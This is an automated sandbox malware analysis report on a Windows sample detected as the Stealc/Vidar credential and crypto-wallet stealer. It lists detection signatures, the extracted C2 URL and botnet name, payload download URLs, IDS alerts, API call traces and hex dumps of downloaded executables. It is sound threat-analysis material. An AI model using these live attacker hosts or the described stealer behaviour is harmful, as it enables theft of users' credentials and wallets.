Windows Analysis Report
hlyG1m5UmO.exe

Overview

General Information

Sample name: hlyG1m5UmO.exe
renamed because original name is a hash value
Original sample name: 3ec2504913e8cdf08b76861cd96317d0.exe
Analysis ID: 1530592
MD5: 3ec2504913e8cdf08b76861cd96317d0
SHA1: 0f39916a0e4a5c71359c6fb47d871f8eda113258
SHA256: 986efaa8bb0469535ddac90dbe8cd3e7cd710e9570e7ff2edda7f82b893baa79
Tags: exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: 00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default7_cap"}
Source: 00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://62.204.41.176/edd20096ecef326d.php", "Botnet": "default7_cap"}
Multi AV Scanner detection for domain / URL
Source: http://176.113.115.37/ScreenUpdateSync.exeP Virustotal: Detection: 12% Perma Link
Source: http://62.204.41.176 Virustotal: Detection: 14% Perma Link
Source: http://62.204.41.176/edd20096ecef326d.php#g Virustotal: Detection: 11% Perma Link
Source: http://176.113.115.37/ScreenUpdateSync.exeprtscreen1566SOFTWARE Virustotal: Detection: 12% Perma Link
Source: http://62.204.41.176/edd20096ecef326d.php Virustotal: Detection: 11% Perma Link
Source: http://176.113.115.37/seed.exe Virustotal: Detection: 14% Perma Link
Source: http://176.113.115.37/ScreenUpdateSync.exe#j Virustotal: Detection: 17% Perma Link
Source: http://176.113.115.37/ScreenUpdateSync.exe Virustotal: Detection: 17% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\seed[1].exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: hlyG1m5UmO.exe Virustotal: Detection: 10% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.8% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 16_2_00409B60
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA, 16_2_0040C820
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 16_2_00407240
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 16_2_00409AC0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 16_2_00418EA0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C146C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 16_2_6C146C80
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C29A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 16_2_6C29A9A0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C264420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 16_2_6C264420
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C294440 PK11_PrivDecrypt, 16_2_6C294440
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2944C0 PK11_PubEncrypt, 16_2_6C2944C0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 16_2_6C2E25B0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C278670 PK11_ExportEncryptedPrivKeyInfo, 16_2_6C278670
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C29A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 16_2_6C29A650
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C27E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 16_2_6C27E6E0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C2BA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 16_2_6C2BA730

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Unpacked PE file: 16.2.1248.tmp.exe.400000.0.unpack
Uses 32bit PE files
Source: hlyG1m5UmO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49978 version: TLS 1.2
Source: hlyG1m5UmO.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr, freebl3[1].dll.16.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.16.dr, freebl3[1].dll.16.dr
Source: Binary string: nss3.pdb@ source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr
Source: Binary string: C:\Users\Administrator\Desktop\net8.0-windows7.0\Data\src\WalletsUpdater\WalletsUpdater\obj\Release\WalletsUpdater.pdb source: LocalCGIDAAAKJJ.exe, 0000002B.00000000.3327544133.0000000000812000.00000002.00000001.01000000.0000000E.sdmp, seed[1].exe.16.dr, LocalCGIDAAAKJJ.exe.16.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.16.dr, softokn3.dll.16.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr, vcruntime140[1].dll.16.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr, msvcp140[1].dll.16.dr
Source: Binary string: nss3.pdb source: 1248.tmp.exe, 00000010.00000002.3373657073.000000006C36F000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.16.dr, nss3[1].dll.16.dr
Source: Binary string: mozglue.pdb source: 1248.tmp.exe, 00000010.00000002.3373439337.000000006C1AD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.16.dr, mozglue.dll.16.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.16.dr, softokn3.dll.16.dr
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 15_2_002C4005
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 15_2_002CC2FF
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C494A GetFileAttributesW,FindFirstFileW,FindClose, 15_2_002C494A
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CCD14 FindFirstFileW,FindClose, 15_2_002CCD14
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 15_2_002CCD9F
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 15_2_002CF5D8
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 15_2_002CF735
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 15_2_002CFA36
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 15_2_002C3CE2
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00439ED2 FindFirstFileExW, 15_2_00439ED2
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 16_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 16_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 16_2_00414910
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 16_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 16_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 16_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 16_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 16_2_00414570
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 16_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 16_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 16_2_00413EA0
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\464151 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\464151\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49980 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49980 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 62.204.41.176:80 -> 192.168.2.5:49980
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49980 -> 62.204.41.176:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 62.204.41.176:80 -> 192.168.2.5:49980
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49980 -> 62.204.41.176:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://62.204.41.176/edd20096ecef326d.php
Source: Malware configuration extractor URLs: http://62.204.41.176/edd20096ecef326d.php
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:28:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 10 Oct 2024 07:15:01 GMTETag: "53e00-6241a210243f2"Accept-Ranges: bytesContent-Length: 343552Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 aa ba 9b 35 ee db f5 66 ee db f5 66 ee db f5 66 f0 89 71 66 f4 db f5 66 f0 89 60 66 fe db f5 66 f0 89 76 66 a4 db f5 66 c9 1d 8e 66 ed db f5 66 ee db f4 66 9f db f5 66 f0 89 7f 66 ef db f5 66 f0 89 61 66 ef db f5 66 f0 89 64 66 ef db f5 66 52 69 63 68 ee db f5 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 71 3f 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 03 00 00 dc 0f 00 00 00 00 00 17 12 00 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 a5 78 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 36 03 00 28 00 00 00 00 20 11 00 e0 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 34 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 af 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 1f 00 00 00 20 03 00 00 20 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c a5 0d 00 00 40 03 00 00 14 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 69 77 61 70 65 68 00 04 00 00 00 f0 10 00 00 04 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 1d 05 00 00 00 00 11 00 00 06 00 00 00 46 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 69 6d 00 00 00 00 00 04 00 00 00 10 11 00 00 04 00 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 ec 14 00 00 20 11 00 00 ee 01 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:28:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
